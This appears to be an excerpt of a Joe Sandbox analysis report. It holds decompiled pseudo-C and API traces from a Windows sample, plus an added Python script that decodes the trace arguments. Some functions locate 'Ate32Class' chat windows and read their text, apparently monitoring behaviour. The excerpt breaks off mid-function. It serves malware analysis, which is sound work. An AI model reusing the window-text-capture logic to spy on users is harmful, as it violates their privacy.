    • Associated: 00000000.00000002.225954502.000000000045B000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.225975427.0000000000468000.00000002.00020000.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_400000_executable.jbxd
    Similarity
    • API ID: #537
    • String ID: E-mail$Explore$None$Open$Print$User defined$xTE$|TE
    • API String ID: 4256512136-3308549982
    • Opcode ID: a8e9cae7499d3ca04c8e4de0133e0d206f488b7c76653715f1e325c00be744f2
    • Instruction ID: 55850c7c3b5e04823ced849e43447ce60dbb7989911fb11bc189d81d950b7f60
    • Opcode Fuzzy Hash: a8e9cae7499d3ca04c8e4de0133e0d206f488b7c76653715f1e325c00be744f2
    • Instruction Fuzzy Hash: F2D0B210F90D405545187ED5F43373D5842C7DD7CBB51A15F7D411E1D38E4C5A5D452D
    Uniqueness

    Uniqueness Score: -1.00%
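Reading the APIs lists in this report means translating the raw hex arguments the sandbox prints back into Win32 names: 0xCC with wParam 0x2A is EM_SETPASSWORDCHAR with '*', 0x1036 with lParam 0x521 is LVM_SETEXTENDEDLISTVIEWSTYLE with a list-view style mask, and 0x40000000 / 2 / 0x80 passed to CreateFileA are GENERIC_WRITE, CREATE_ALWAYS and FILE_ATTRIBUTE_NORMAL. The Python script below is an added example of doing that mechanically; it is not part of the Joe Sandbox report and not code from the analysed sample. It parses the report's API-trace line format, decodes only the argument positions it knows for a handful of APIs, and leaves everything else as text. The sample input lines are copied from the APIs lists on this page, the constant values are those of the Windows SDK headers, and the function and table names are the example's own. One caveat it encodes: the report prints whatever stack slots it captured rather than a verified argument count (the MFC ordinal calls show up with sixteen "arguments" that are really the caller's residue), so a decoder must never interpret positions beyond the API's real arity.

```python
import re

# Constructed sample input: API-trace lines copied from the "APIs" lists of this report.
SAMPLE_LINES = [
    "• SendMessageA.USER32(?,000000CC,0000002A,00000000), ref: 00419FF3",
    "• SendMessageA.USER32(?,00001036,00000000,00000521), ref: 0040EB6C",
    "• SendMessageA.USER32(?,0000014E,?,00000000), ref: 0040EBCB",
    "• CreateFileA.KERNEL32(?,40000000,00000000,00000000,00000002,00000080,00000000), ref: 00427694",
    "• ShellExecuteA.SHELL32(00000000,open,explorer.exe,?,00000000,00000005), ref: 0041F26E",
    "• GetSysColor.USER32(0000000F), ref: 00419F77",
    "• #4710.MFC42 ref: 0040EA8E",
]

# One API line: optional bullet, "Name.MODULE", optional "(args)", then "ref: ADDR".
API_LINE = re.compile(r"^\s*•?\s*(?P<name>[#\w]+)\.(?P<module>\w+)"
                      r"(?:\((?P<args>.*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)\s*$")
HEX_ARG = re.compile(r"^[0-9A-Fa-f]{8}$")  # the report prints numbers as 8 hex digits

# Constant values from the Windows SDK headers (winuser.h, winnt.h, commctrl.h).
MESSAGES = {0x0100: "WM_KEYDOWN", 0x0102: "WM_CHAR", 0x0111: "WM_COMMAND",
            0x00CC: "EM_SETPASSWORDCHAR", 0x014E: "CB_SETCURSEL", 0x1036: "LVM_SETEXTENDEDLISTVIEWSTYLE"}
LVS_EX = [(0x1, "LVS_EX_GRIDLINES"), (0x20, "LVS_EX_FULLROWSELECT"),
          (0x100, "LVS_EX_FLATSB"), (0x400, "LVS_EX_INFOTIP")]
ACCESS = [(0x80000000, "GENERIC_READ"), (0x40000000, "GENERIC_WRITE"),
          (0x20000000, "GENERIC_EXECUTE"), (0x10000000, "GENERIC_ALL")]
SHARE = [(0x1, "FILE_SHARE_READ"), (0x2, "FILE_SHARE_WRITE"), (0x4, "FILE_SHARE_DELETE")]
DISPOSITION = {1: "CREATE_NEW", 2: "CREATE_ALWAYS", 3: "OPEN_EXISTING", 4: "OPEN_ALWAYS", 5: "TRUNCATE_EXISTING"}
ATTRS = [(0x1, "FILE_ATTRIBUTE_READONLY"), (0x2, "FILE_ATTRIBUTE_HIDDEN"),
         (0x80, "FILE_ATTRIBUTE_NORMAL"), (0x04000000, "FILE_FLAG_DELETE_ON_CLOSE")]
SHOW_CMD = {0: "SW_HIDE", 1: "SW_SHOWNORMAL", 5: "SW_SHOW", 6: "SW_MINIMIZE", 8: "SW_SHOWNA"}
SYS_COLOR = {15: "COLOR_3DFACE"}


def flags(value, table):
    """Expand a bitmask into the names in `table`; bits not in the table stay as hex."""
    names = [name for bit, name in table if value & bit]
    leftover = value & ~sum(bit for bit, _ in table)
    if leftover:
        names.append(f"0x{leftover:X}")
    return "|".join(names) if names else "0"


def _send_message(args):
    # SendMessageA/PostMessageA(hWnd, Msg, wParam, lParam): name Msg, then decode
    # the parameter whose meaning depends on it.
    if len(args) < 2 or not isinstance(args[1], int):
        return []
    msg = args[1]
    notes = ["msg=" + MESSAGES.get(msg, f"0x{msg:X}")]
    wparam = args[2] if len(args) > 2 else None
    lparam = args[3] if len(args) > 3 else None
    if msg == 0x00CC and isinstance(wparam, int):
        notes.append(f"password char={chr(wparam)!r}")  # the edit control now masks its input
    elif msg == 0x1036 and isinstance(lparam, int):
        notes.append("style=" + flags(lparam, LVS_EX))
    elif msg == 0x014E and isinstance(wparam, int):
        notes.append(f"select index {wparam}")
    return notes


def _create_file(args):
    # CreateFileA(name, access, share, security, disposition, attrs, template)
    if len(args) < 6 or not all(isinstance(args[i], int) for i in (1, 2, 4, 5)):
        return []
    return ["access=" + flags(args[1], ACCESS), "share=" + flags(args[2], SHARE),
            "disposition=" + DISPOSITION.get(args[4], f"0x{args[4]:X}"),
            "attrs=" + flags(args[5], ATTRS)]


def _shell_execute(args):
    # ShellExecuteA(hwnd, verb, file, params, dir, showcmd)
    if len(args) < 6:
        return []
    notes = [f"verb={args[1]} file={args[2]} params={args[3]}"]
    if isinstance(args[5], int):
        notes.append("show=" + SHOW_CMD.get(args[5], f"0x{args[5]:X}"))
    return notes


# Only the positions the named API really takes are decoded: the report prints the
# stack slots it captured, so trailing columns are usually the caller's residue.
DECODERS = {"SendMessageA": _send_message, "PostMessageA": _send_message,
            "CreateFileA": _create_file, "ShellExecuteA": _shell_execute,
            "GetSysColor": lambda a: ["index=" + SYS_COLOR.get(a[0], str(a[0]))]
            if a and isinstance(a[0], int) else []}


def parse_args(text):
    """Split the argument column on commas; 8-hex-digit tokens become ints, the rest stay text."""
    if not text:
        return []
    return [int(tok, 16) if HEX_ARG.match(tok) else tok for tok in text.split(",")]


def decode_api_line(line):
    """Return None for lines that are not API entries, else the parsed fields plus symbolic notes."""
    m = API_LINE.match(line)
    if m is None:
        return None
    args = parse_args(m.group("args"))
    decoder = DECODERS.get(m.group("name"))
    return {"name": m.group("name"), "module": m.group("module"), "ref": m.group("ref"),
            "args": args, "notes": decoder(args) if decoder else []}


def annotate(lines):
    """Decode every API entry in `lines`; lines that are not API entries are dropped."""
    return [rec for rec in map(decode_api_line, lines) if rec is not None]
```

Feeding a whole report section through annotate() and printing ref, name and notes gives a one-line symbolic summary per call. The comma split is deliberately naive: a string argument that itself contains a comma, such as the `/select,"` literal passed to #537 in E0041F1F6, is split into two tokens, and a quote-aware tokenizer would be needed before decoding such lines.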

    C-Code - Quality: 54%
    			E004275DF(void* __eflags) {
    				intOrPtr* _t37;
    				intOrPtr* _t40;
    				intOrPtr* _t42;
    				int _t48;
    				void* _t70;
    				void* _t72;
    
    				E0043E4E0(0x442d78, _t72);
    				L0043DDD8();
    				_push(_t72 - 0x2c);
    				 *(_t72 - 4) = 0;
    				L0043E4A4();
    				_t37 = E004290DB( *((intOrPtr*)(_t72 + 0xc)), _t72 - 0x18, _t72 - 0x2c);
    				 *(_t72 - 4) = 1;
    				_t40 = E00429098( *((intOrPtr*)(_t72 + 0xc)), _t72 - 0x14, _t72 - 0x2c);
    				 *(_t72 - 4) = 2;
    				_t42 = E00429029(_t72 + 0xc, 0xe05c);
    				_push( *((intOrPtr*)(_t72 + 0x14)));
    				 *(_t72 - 4) = 3;
    				_push( *((intOrPtr*)(_t72 + 0x18)));
    				_push( *((intOrPtr*)(_t72 + 0x10)));
    				_push( *_t37);
    				_push( *_t40);
    				_push( *_t42);
    				_push(_t72 - 0x10);
    				L0043E174();
    				 *(_t72 - 4) = 2;
    				L0043DD36();
    				 *(_t72 - 4) = 1;
    				L0043DD36();
    				 *(_t72 - 4) = 0;
    				L0043DD36();
    				_t70 = CreateFileA( *(_t72 + 8), 0x40000000, 0, 0, 2, 0x80, 0); // GENERIC_WRITE, no sharing, CREATE_ALWAYS (replaces an existing file), FILE_ATTRIBUTE_NORMAL
    				if(_t70 != 0xffffffff) {
    					_t48 = WriteFile(_t70,  *(_t72 - 0x10),  *( *(_t72 - 0x10) - 8), _t72 - 0x1c, 0); // byte count is the length field of the MFC CString header stored just before the buffer
    					_push(_t70);
    					if(_t48 != 0) {
    						CloseHandle();
    						E0042AAFA( *(_t72 + 8));
    						_push(1);
    						_pop(0);
    					} else {
    						CloseHandle();
    					}
    				}
    				 *(_t72 - 4) =  *(_t72 - 4) | 0xffffffff;
    				L0043DD36();
    				 *[fs:0x0] =  *((intOrPtr*)(_t72 - 0xc));
    				return 0;
    			}

    Statement addresses (one per C-code line above): 0x004275e4 to 0x004276f0

    APIs
    • __EH_prolog.LIBCMT ref: 004275E4
    • #540.MFC42 ref: 004275F2
    • #6673.MFC42(?), ref: 00427603
      • Part of subcall function 004290DB: GetTimeFormatA.KERNEL32(00000400,00000002,?,00000000,00455AE8,00000032,00000000,?,?,00429D29,?,?,?,?), ref: 004290FD
      • Part of subcall function 004290DB: #537.MFC42(00455AE8,?,00429D29,?,?,?,?), ref: 00429107
      • Part of subcall function 00429098: GetDateFormatA.KERNEL32(00000400,00000000,?,dddd, d MMMM,00455B1C,00000032,?,?,?,00429C3B,?,?,?,?,000007E4,?), ref: 004290BD
      • Part of subcall function 00429098: CharUpperBuffA.USER32(00455B1C,00000001,?,?,00429C3B,?,?,?,?,000007E4,?), ref: 004290C6
      • Part of subcall function 00429098: #537.MFC42(00455B1C,?,?,00429C3B,?,?,?,?,000007E4,?), ref: 004290D0
      • Part of subcall function 00429029: #1168.MFC42(00000002), ref: 00429052
      • Part of subcall function 00429029: LoadStringA.USER32 ref: 0042906A
      • Part of subcall function 00429029: #537.MFC42(00000001), ref: 0042907A
    • #2818.MFC42(?,?,00000000,00000000,?,?,?,?,?,?), ref: 00427657
    • #800.MFC42(?,?,?,?,?,?,?,?,?,?), ref: 00427666
    • #800.MFC42(?,?,?,?,?,?,?,?,?,?), ref: 00427672
    • #800.MFC42(?,?,?,?,?,?,?,?,?,?), ref: 0042767D
    • CreateFileA.KERNEL32(?,40000000,00000000,00000000,00000002,00000080,00000000), ref: 00427694
    • WriteFile.KERNEL32(00000000,?,?,?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 004276AF
    • CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?), ref: 004276BA
    • CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?), ref: 004276C2
    • #800.MFC42(?,?,?,?,?,?,?,?,?,?), ref: 004276DB
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.225836417.0000000000424000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.225760151.0000000000400000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.225766751.0000000000401000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225780263.0000000000403000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225787087.0000000000406000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225794652.0000000000409000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225805945.0000000000414000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225814365.0000000000418000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225827911.000000000041F000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225848031.000000000042C000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225861065.000000000043D000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225868415.0000000000444000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.225876800.0000000000446000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.225887743.0000000000450000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.225907145.0000000000453000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.225917493.0000000000454000.00000008.00020000.sdmp
    • Associated: 00000000.00000002.225938237.0000000000455000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.225954502.000000000045B000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.225975427.0000000000468000.00000002.00020000.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_400000_executable.jbxd
    Similarity
    • API ID: #800$#537$CloseFileFormatHandle$#1168#2818#540#6673BuffCharCreateDateH_prologLoadStringTimeUpperWrite
    • String ID: x-D
    • API String ID: 2788149937-4097327004
    • Opcode ID: 400d082385d21d049317d783a9442f1b225247440449403e0a3a03c33a10ab4e
    • Instruction ID: 8670b15b30c493a70c5479378da383e79abe782c95bf9aa93e95971539482b84
    • Opcode Fuzzy Hash: 400d082385d21d049317d783a9442f1b225247440449403e0a3a03c33a10ab4e
    • Instruction Fuzzy Hash: 7B319E72900118FFDB11EFA8DC85AEEBBB8EF19314F00415AF911A3191DB785E04CB65
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 48%
    			E0041F66D(void* __ecx, void* __edx) {
    				char _v360;
    				void* __esi;
    				void* __ebp;
    				void* _t14;
    				intOrPtr _t15;
    				void* _t16;
    				intOrPtr _t18;
    				long _t30;
    				void* _t40;
    				int _t42;
    				void* _t44;
    
    				_t40 = __edx;
    				_t44 = __ecx;
    				L0043DF94();
    				_push(1);
    				_push(0x808080);
    				_push(0x10101);
    				_push(0xefefef);
    				_push(__ecx);
    				_push(0x3e8);
    				_t15 = L00404F47(_t14, __ecx + 0x9c, __ecx);
    				_push(1);
    				_push(0);
    				_t30 = _t44 + 0x90;
    				_push(0x21);
    				_push(0x20);
    				_push(0x20);
    				L0043E3B4();
    				_push(0x499);
    				L0043E066();
    				 *((intOrPtr*)(_t44 + 0x98)) = _t15;
    				_t16 = L004044C9(_t15, _t44, _t44);
    				_push(0x43b);
    				_t42 = _t16 + 0x6c;
    				L0043E066();
    				if(_t42 != 0) {
    					_t42 =  *(_t42 + 4);
    				}
    				SendMessageA( *(_t16 + 0x20), 0x30, _t42, 1);
    				_push(0x4554b8);
    				_push(0x42d);
    				L0043E06C();
    				_t18 =  *((intOrPtr*)(_t44 + 0x98));
    				if(_t30 != 0) {
    					_t30 =  *(_t30 + 4);
    				}
    				_push(SendMessageA( *(_t18 + 0x20), 0x1003, 0, _t30));
    				L0043E3AE();
    				E0041F818(_t44, _t40);
    				if(SendMessageA( *( *((intOrPtr*)(_t44 + 0x98)) + 0x20), 0x1004, 0, 0) == 0) {
    					GetSystemDirectoryA( &_v360, 0x105);
    					lstrcatA( &_v360, "\\shell32.dll");
    					_push( &_v360);
    					_push(0x42d);
    					L0043E06C();
    					E0041F818(_t44, _t40);
    				}
    				return 0;
    			}

    APIs
    • #4710.MFC42 ref: 0041F679
    • #2096.MFC42(00000020,00000020,00000021,00000000,00000001,?,00EFEFEF,00010101,00808080,00000001), ref: 0041F6B2
    • #3092.MFC42(00000499,00000020,00000020,00000021,00000000,00000001,?,00EFEFEF,00010101,00808080,00000001), ref: 0041F6BE
    • #3092.MFC42(0000043B,?,00EFEFEF,00010101,00808080,00000001), ref: 0041F6DA
    • SendMessageA.USER32(?,00000030,-0000006C,00000001), ref: 0041F6F4
    • #5953.MFC42(0000042D,004554B8,?,00EFEFEF,00010101,00808080,00000001), ref: 0041F703
    • SendMessageA.USER32(?,00001003,00000000,?), ref: 0041F720
    • #2862.MFC42(00000000,?,00EFEFEF,00010101,00808080,00000001), ref: 0041F723
    • SendMessageA.USER32(?,00001004,00000000,00000000), ref: 0041F741
    • GetSystemDirectoryA.KERNEL32 ref: 0041F751
    • lstrcatA.KERNEL32(?,\shell32.dll,?,00EFEFEF,00010101,00808080,00000001), ref: 0041F761
    • #5953.MFC42(0000042D,?,?,00EFEFEF,00010101,00808080,00000001), ref: 0041F76F
    Memory Dump Source
    • Source File: 00000000.00000002.225827911.000000000041F000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_400000_executable.jbxd
    Similarity
    • API ID: MessageSend$#3092#5953$#2096#2862#4710DirectorySystemlstrcat
    • String ID: \shell32.dll
    • API String ID: 2445196989-3783449302
    • Opcode ID: e184c3c436f6f1e71ffdbc978936efb3d803318cdcf281116a4fd23a5638243c
    • Instruction ID: 5539777ea0326a4cb018b459cb392cb0a15c47d8503afc756ea100e2d2f3f513
    • Opcode Fuzzy Hash: e184c3c436f6f1e71ffdbc978936efb3d803318cdcf281116a4fd23a5638243c
    • Instruction Fuzzy Hash: B421F9713907047BE620B7729C87FAA7659DF84B04F01042EF7456B2D2DFEDA8894758
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 62%
    			E00422E3C() {
    				void* _t24;
    				void* _t25;
    				void* _t26;
    				void* _t30;
    				void* _t42;
    
    				_t24 = E0043E4E0(0x442584, _t42);
    				 *(_t42 - 4) =  *(_t42 - 4) & 0x00000000;
    				_push("::/");
    				L0043DE26();
    				_push("bpk.chm");
    				_t25 = _t42 - 0x18;
    				_push(0x4558c8);
    				_push(_t25);
    				 *(_t42 - 4) = 1;
    				L0043DE20();
    				_push(_t24);
    				_push(_t25);
    				_t26 = _t42 - 0x14;
    				 *(_t42 - 4) = 2;
    				_push(_t26);
    				L0043E282();
    				 *(_t42 - 4) = 3;
    				_push(_t42 + 8);
    				_push(_t26);
    				_push(_t42 - 0x10);
    				L0043E282();
    				_t30 = L0042C92C(GetDesktopWindow(),  *((intOrPtr*)(_t42 - 0x10)), 1, 0);
    				L0043DD36();
    				 *(_t42 - 4) = 2;
    				L0043DD36();
    				 *(_t42 - 4) = 1;
    				L0043DD36();
    				 *(_t42 - 4) =  *(_t42 - 4) & 0x00000000;
    				L0043DD36();
    				 *(_t42 - 4) =  *(_t42 - 4) | 0xffffffff;
    				L0043DD36();
    				 *[fs:0x0] =  *((intOrPtr*)(_t42 - 0xc));
    				return _t30;
    			}

    Memory Dump Source
    • Source File: 00000000.00000002.225827911.000000000041F000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_400000_executable.jbxd
    Similarity
    • API ID: #800$#922$#537#924DesktopH_prologWindow
    • String ID: ::/$bpk.chm
    • API String ID: 1943509954-2471876148
    • Opcode ID: 330946893fc0247122092e15f6b359f6f33634cb2bca5c83113eb70742dbad66
    • Instruction ID: 26fb620d57a73318d47b04f2923db2dc571e5f65638a0b84f9cf138c446bb98a
    • Opcode Fuzzy Hash: 330946893fc0247122092e15f6b359f6f33634cb2bca5c83113eb70742dbad66
    • Instruction Fuzzy Hash: E5119171C01249EADB10FBE5D946BEEBB78AF19308F50459EB401A71C2DBBC5B08C769
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 65%
    			E0040F5A5(intOrPtr* __ecx) {
    				intOrPtr* _t44;
    				intOrPtr _t53;
    				void* _t59;
    				intOrPtr* _t82;
    				void* _t84;
    				intOrPtr _t86;
    
    				E0043E4E0(0x440354, _t84);
    				_push(__ecx);
    				_push(__ecx);
    				_t82 = __ecx;
    				 *((intOrPtr*)(_t84 - 0x10)) = _t86;
    				 *((intOrPtr*)(_t84 - 0x14)) = __ecx;
    				L0043DDD8();
    				 *(_t84 - 4) =  *(_t84 - 4) & 0x00000000;
    				L0043DDD8();
    				 *(_t84 - 4) = 1;
    				L0043DDD8();
    				_t59 = __ecx + 0x14;
    				 *(_t84 - 4) = 2;
    				L0043DDD8();
    				_t44 =  *((intOrPtr*)(_t84 + 0xc));
    				_t53 =  *((intOrPtr*)(_t84 + 8));
    				_t88 = _t44;
    				 *(_t84 - 4) = 3;
    				 *((intOrPtr*)(__ecx + 4)) = _t53;
    				if(_t44 == 0) {
    					_push(_t44);
    					_push(_t53);
    					_t44 = E0040FB99(_t59, _t88);
    				}
    				 *_t82 = _t44;
    				if( *((intOrPtr*)(_t84 + 0x10)) != 0) {
    					_push( *((intOrPtr*)(_t84 + 0x10)));
    					L0043DDD2();
    				} else {
    					_push( *((intOrPtr*)( *_t44))(_t84 + 0x10, _t53));
    					 *(_t84 - 4) = 4;
    					L0043DFCA();
    					 *(_t84 - 4) = 3;
    					L0043DD36();
    				}
    				if( *((intOrPtr*)(_t84 + 0x14)) != 0) {
    					_push( *((intOrPtr*)(_t84 + 0x14)));
    					L0043DDD2();
    				} else {
    					_push(_t53);
    					_push(_t84 + 0x10);
    					 *(_t84 - 4) = 5;
    					_push(E0040FEA7());
    					 *(_t84 - 4) = 6;
    					L0043DFCA();
    					 *(_t84 - 4) = 5;
    					L0043DD36();
    					 *(_t84 - 4) = 3;
    				}
    				if( *((intOrPtr*)(_t84 + 0x18)) != 0) {
    					_push( *((intOrPtr*)(_t84 + 0x18)));
    					L0043DDD2();
    				} else {
    					 *(_t84 - 4) = 8;
    					_push( *((intOrPtr*)( *((intOrPtr*)( *_t82)) + 4))(_t84 + 0x10, _t53));
    					 *(_t84 - 4) = 9;
    					L0043DFCA();
    					 *(_t84 - 4) = 8;
    					L0043DD36();
    				}
    				 *[fs:0x0] =  *((intOrPtr*)(_t84 - 0xc));
    				return _t82;
    			}

    APIs
    • __EH_prolog.LIBCMT ref: 0040F5AA
    • #540.MFC42(00000000,?,00000000,?,?,0040F372,?,?,?,?,?), ref: 0040F5BF
    • #540.MFC42(00000000,?,00000000,?,?,0040F372,?,?,?,?,?), ref: 0040F5CB
    • #540.MFC42(00000000,?,00000000,?,?,0040F372,?,?,?,?,?), ref: 0040F5D9
    • #540.MFC42(00000000,?,00000000,?,?,0040F372,?,?,?,?,?), ref: 0040F5E5
    • #858.MFC42(00000000,?,00000000,?,?,0040F372,?,?,?,?,?), ref: 0040F61E
    • #800.MFC42(00000000,?,00000000,?,?,0040F372,?,?,?,?,?), ref: 0040F62A
    • #860.MFC42(00000000,00000000,?,00000000,?,?,0040F372,?,?,?,?,?), ref: 0040F636
    • #858.MFC42(00000000,00000000,00000000,?,00000000,?,?,0040F372,?,?,?,?,?), ref: 0040F659
    • #800.MFC42(00000000,00000000,00000000,?,00000000,?,?,0040F372,?,?,?,?,?), ref: 0040F665
    • #858.MFC42(00000000,?,00000000,?,?,0040F372,?,?,?,?,?), ref: 0040F6BA
    • #800.MFC42(00000000,?,00000000,?,?,0040F372,?,?,?,?,?), ref: 0040F6C6
      • Part of subcall function 0040FB99: __EH_prolog.LIBCMT ref: 0040FB9E
      • Part of subcall function 0040FB99: GetClassNameA.USER32(?,?,0000001E), ref: 0040FBBA
    Memory Dump Source
    • Source File: 00000000.00000002.225794652.0000000000409000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_400000_executable.jbxd
    Similarity
    • API ID: #540$#800#858$H_prolog$#860ClassName
    • String ID:
    • API String ID: 3314927051-0
    • Opcode ID: 4a85a00f2d844629ea886a87e98f695ae56b38056590e7406cc5501f0e8e7ea0
    • Instruction ID: 06de775336df9c36160dbb2dd3e60fc8e1940705639a5333776814398150c1b1
    • Opcode Fuzzy Hash: 4a85a00f2d844629ea886a87e98f695ae56b38056590e7406cc5501f0e8e7ea0
    • Instruction Fuzzy Hash: CB41D270804249DFDB25DF65D845BAEBBB8EF19308F10486EF442632D1DB786A09C766
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 69%
    			E0040984B() {
    				void* _t33;
    				intOrPtr* _t36;
    				intOrPtr _t37;
    				void* _t38;
    				void* _t59;
    				intOrPtr _t62;
    				void* _t64;
    
    				E0043E4E0(0x43f8a3, _t64);
    				 *((intOrPtr*)(_t64 - 0x1c)) = 0;
    				_push(FindWindowExA(E0040FE29( *((intOrPtr*)(_t64 + 0xc)), "WndAte32Class", 0), 0, "Ate32Class", 0));
    				_push(_t64 - 0x14);
    				_t33 = E0040FEA7();
    				_t62 = 1;
    				_push(0x3e);
    				_push(_t33);
    				 *((intOrPtr*)(_t64 - 4)) = _t62;
    				_push(_t64 + 0xc);
    				L0043E14A();
    				 *((char*)(_t64 - 4)) = 3;
    				L0043DD36();
    				_push( *((intOrPtr*)(_t64 + 0xc)));
    				_t36 =  *((intOrPtr*)(E00409643(_t64 - 0x18)));
    				 *((char*)(_t64 - 4)) = 4;
    				if(_t36 == 0) {
    					_t37 = 0;
    				} else {
    					_t37 =  *_t36;
    				}
    				_t38 = E00429262(_t64 - 0x10, _t37, _t64 - 0x10);
    				_t59 = _t38;
    				 *((char*)(_t64 - 4)) = 3;
    				_t51 =  *((intOrPtr*)(_t64 - 0x18));
    				if( *((intOrPtr*)(_t64 - 0x18)) != 0) {
    					_t38 = E004096DD(_t51);
    				}
    				if(_t59 != 0) {
    					L0043E144();
    					 *((char*)(_t64 - 4)) = 5;
    					L0043DFCA();
    					 *((char*)(_t64 - 4)) = 3;
    					L0043DD36();
    					__imp__#6( *((intOrPtr*)(_t64 - 0x10)), _t38,  *((intOrPtr*)(_t64 - 0x10)));
    				}
    				_push(_t64 + 0xc);
    				L0043DD3C();
    				 *((intOrPtr*)(_t64 - 0x1c)) = _t62;
    				 *((char*)(_t64 - 4)) = 0;
    				L0043DD36();
    				 *[fs:0x0] =  *((intOrPtr*)(_t64 - 0xc));
    				return  *((intOrPtr*)(_t64 + 8));
    			}

    APIs
    • __EH_prolog.LIBCMT ref: 00409850
      • Part of subcall function 0040FE29: FindWindowExA.USER32 ref: 0040FE43
    • FindWindowExA.USER32 ref: 00409878
      • Part of subcall function 0040FEA7: __EH_prolog.LIBCMT ref: 0040FEAC
      • Part of subcall function 0040FEA7: IsWindow.USER32(?), ref: 0040FEC5
      • Part of subcall function 0040FEA7: SendMessageA.USER32(?,0000000E,00000000,00000000), ref: 0040FEDC
      • Part of subcall function 0040FEA7: #823.MFC42(-000000C5), ref: 0040FEEA
      • Part of subcall function 0040FEA7: memset.MSVCRT ref: 0040FEF7
      • Part of subcall function 0040FEA7: SendMessageA.USER32(?,0000000D,-000000CA,?), ref: 0040FF0B
      • Part of subcall function 0040FEA7: #537.MFC42(?), ref: 0040FF13
      • Part of subcall function 0040FEA7: #825.MFC42(?,?), ref: 0040FF1F
      • Part of subcall function 0040FEA7: #535.MFC42(?,?), ref: 0040FF2C
      • Part of subcall function 0040FEA7: #800.MFC42(?,?), ref: 0040FF38
    • #923.MFC42(?,00000000,0000003E), ref: 00409897
    • #800.MFC42(?,00000000,0000003E), ref: 004098A3
      • Part of subcall function 00409643: __EH_prolog.LIBCMT ref: 00409648
      • Part of subcall function 00409643: #823.MFC42(0000000C,?,?,00429CB7,?,?), ref: 00409653
    • #539.MFC42(?,?,?,00000000,0000003E), ref: 004098ED
    • #858.MFC42(00000000,?,?,?,00000000,0000003E), ref: 004098FA
    • #800.MFC42(00000000,?,?,?,00000000,0000003E), ref: 00409906
    • SysFreeString.OLEAUT32(?), ref: 0040990E
    • #535.MFC42(?,?,?,00000000,0000003E), ref: 0040991B
    • #800.MFC42(?,?,?,00000000,0000003E), ref: 00409929
    Memory Dump Source
    • Source File: 00000000.00000002.225794652.0000000000409000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_400000_executable.jbxd
    Similarity
    • API ID: #800$H_prologWindow$#535#823FindMessageSend$#537#539#825#858#923FreeStringmemset
    • String ID: Ate32Class$WndAte32Class
    • API String ID: 1302643171-1677065709
    • Opcode ID: 5123dbc4999fadf7a5c21fb31d768d28b9a0d198653586aa49adbb4b3d069060
    • Instruction ID: 543d6a717def23cc1c236db71f6401ab62495e83e32b84bc9a6a3614d1949366
    • Opcode Fuzzy Hash: 5123dbc4999fadf7a5c21fb31d768d28b9a0d198653586aa49adbb4b3d069060
    • Instruction Fuzzy Hash: C2319F72D00149AEDF15EFA5D885AEEBB78EF15358F10842FF81167282DA385F08CB64
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 69%
    			E0040954D() {
    				void* _t33;
    				intOrPtr* _t36;
    				intOrPtr _t37;
    				void* _t38;
    				void* _t59;
    				intOrPtr _t62;
    				void* _t64;
    
    				E0043E4E0(0x43f80b, _t64);
    				 *((intOrPtr*)(_t64 - 0x1c)) = 0;
    				_push(FindWindowExA(E0040FE29( *((intOrPtr*)(_t64 + 0xc)), "WndAte32Class", 0), 0, "Ate32Class", 0));
    				_push(_t64 - 0x14);
    				_t33 = E0040FEA7();
    				_t62 = 1;
    				_push(0x3e);
    				_push(_t33);
    				 *((intOrPtr*)(_t64 - 4)) = _t62;
    				_push(_t64 + 0xc);
    				L0043E14A();
    				 *((char*)(_t64 - 4)) = 3;
    				L0043DD36();
    				_push( *((intOrPtr*)(_t64 + 0xc)));
    				_t36 =  *((intOrPtr*)(E00409643(_t64 - 0x18)));
    				 *((char*)(_t64 - 4)) = 4;
    				if(_t36 == 0) {
    					_t37 = 0;
    				} else {
    					_t37 =  *_t36;
    				}
    				_t38 = E00429262(_t64 - 0x10, _t37, _t64 - 0x10);
    				_t59 = _t38;
    				 *((char*)(_t64 - 4)) = 3;
    				_t51 =  *((intOrPtr*)(_t64 - 0x18));
    				if( *((intOrPtr*)(_t64 - 0x18)) != 0) {
    					_t38 = E004096DD(_t51);
    				}
    				if(_t59 != 0) {
    					L0043E144();
    					 *((char*)(_t64 - 4)) = 5;
    					L0043DFCA();
    					 *((char*)(_t64 - 4)) = 3;
    					L0043DD36();
